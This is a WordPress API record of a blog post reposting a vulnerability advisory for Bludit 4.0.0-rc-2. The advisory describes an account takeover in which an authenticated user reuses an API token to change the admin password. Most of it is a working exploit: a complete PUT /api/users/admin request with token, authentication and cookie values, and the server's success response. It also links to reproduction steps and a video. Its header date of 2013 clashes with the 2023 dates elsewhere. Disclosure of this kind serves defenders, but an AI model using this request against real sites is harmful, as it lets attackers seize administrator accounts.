{"id":40285,"date":"2023-04-11T19:01:00","date_gmt":"2023-04-11T15:01:00","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/171808\/bludit400rc2-escalate.txt"},"modified":"2023-04-12T01:07:25","modified_gmt":"2023-04-11T20:37:25","slug":"bludit-4-0-0-rc-2-privilege-escalation","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/bludit-4-0-0-rc-2-privilege-escalation\/","title":{"rendered":"Bludit 4.0.0-rc-2 Privilege Escalation"},"content":{"rendered":"<p>## Title: Bludit-4.0.0-rc-2 &#8211; Release candidate 2 Account takeover:<br \/>\nAPI token vulnerability<br \/>\n## Author: nu11secur1ty<br \/>\n## Date: 04.11.2013<br \/>\n## Vendor: https:\/\/www.bludit.com\/<br \/>\n## Software: https:\/\/github.com\/bludit\/bludit\/releases\/tag\/4.0.0-rc-2<br \/>\n## Reference: https:\/\/www.cloudflare.com\/learning\/access-management\/account-takeover\/<br \/>\n## Reference: https:\/\/portswigger.net\/daily-swig\/facebook-account-takeover-researcher-scoops-40k-bug-bounty-for-chained-exploit<\/p>\n<p>## Description:<br \/>\nThe already authenticated attacker can send a normal request to change<br \/>\nhis password and then he can use<br \/>\nthe same JSON `object` and the vulnerable `API token KEY` in the same<br \/>\nrequest to change the admin account password.<br \/>\nThen he can access the admin account and he can do very malicious stuff.<\/p>\n<p>STATUS: HIGH Vulnerability<\/p>\n[+]Exploit:<br \/>\n&#8220;`PUT<br \/>\nPUT \/api\/users\/admin HTTP\/1.1<br \/>\nHost: 127.0.0.1:8000<br \/>\nContent-Length: 138<br \/>\nsec-ch-ua: &#8220;Not:A-Brand&#8221;;v=&#8221;99&#8243;, &#8220;Chromium&#8221;;v=&#8221;112&#8243;<br \/>\nsec-ch-ua-platform: &#8220;Windows&#8221;<br \/>\nsec-ch-ua-mobile: ?0<br \/>\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64)<br \/>\nAppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/112.0.5615.50<br \/>\nSafari\/537.36<br \/>\ncontent-type: application\/json<br \/>\nAccept: *\/*<br \/>\nOrigin: http:\/\/127.0.0.1:8000<br \/>\nSec-Fetch-Site: same-origin<br \/>\nSec-Fetch-Mode: cors<br \/>\nSec-Fetch-Dest: empty<br \/>\nReferer: http:\/\/127.0.0.1:8000\/admin\/edit-user\/pwned<br \/>\nAccept-Encoding: gzip, deflate<br \/>\nAccept-Language: en-US,en;q=0.9<br \/>\nCookie: BLUDIT-KEY=98t31p2g0i7t6rscufuccpthui<br \/>\nConnection: close<\/p>\n<p>{&#8220;token&#8221;:&#8221;4f8df9f64e84fa4562ec3a604bf7985c&#8221;,&#8221;authentication&#8221;:&#8221;6d1a5510a53f9d89325b0cd56a2855a9&#8243;,&#8221;username&#8221;:&#8221;pwned&#8221;,&#8221;password&#8221;:&#8221;password1&#8243;}<\/p>\n<p>&#8220;`<\/p>\n[+]Response:<br \/>\n&#8220;`HTTP<br \/>\nHTTP\/1.1 200 OK<br \/>\nHost: 127.0.0.1:8000<br \/>\nDate: Tue, 11 Apr 2023 08:33:51 GMT<br \/>\nConnection: close<br \/>\nX-Powered-By: PHP\/7.4.30<br \/>\nAccess-Control-Allow-Origin: *<br \/>\nContent-Type: application\/json<\/p>\n<p>{&#8220;status&#8221;:&#8221;0&#8243;,&#8221;message&#8221;:&#8221;User edited.&#8221;,&#8221;data&#8221;:{&#8220;key&#8221;:&#8221;admin&#8221;}}<br \/>\n&#8220;`<\/p>\n<p>## Reproduce:<br \/>\n[href](https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/bludit\/2023\/Bludit-v4.0.0-Release-candidate-2)<\/p>\n<p>## Proof and Exploit:<br \/>\n[href](https:\/\/streamable.com\/w3aa4d)<\/p>\n<p>## Time spend:<br \/>\n00:57:00<\/p>\n","protected":false},"excerpt":{"rendered":"<p>## Title: Bludit-4.0.0-rc-2 &#8211; Release candidate 2 Account takeover: API token vulnerability ## Author: nu11secur1ty ## Date: 04.11.2013 ## Vendor: https:\/\/www.bludit.com\/ ## Software: https:\/\/github.com\/bludit\/bludit\/releases\/tag\/4.0.0-rc-2 ## Reference: https:\/\/www.cloudflare.com\/learning\/access-management\/account-takeover\/ ## Reference: https:\/\/portswigger.net\/daily-swig\/facebook-account-takeover-researcher-scoops-40k-bug-bounty-for-chained-exploit ## Description: The already authenticated attacker can send a normal request to change his password and then he can use the same JSON `object` and &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-40285","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/40285","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=40285"}],"version-history":[{"count":2,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/40285\/revisions"}],"predecessor-version":[{"id":40291,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/40285\/revisions\/40291"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=40285"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=40285"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=40285"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}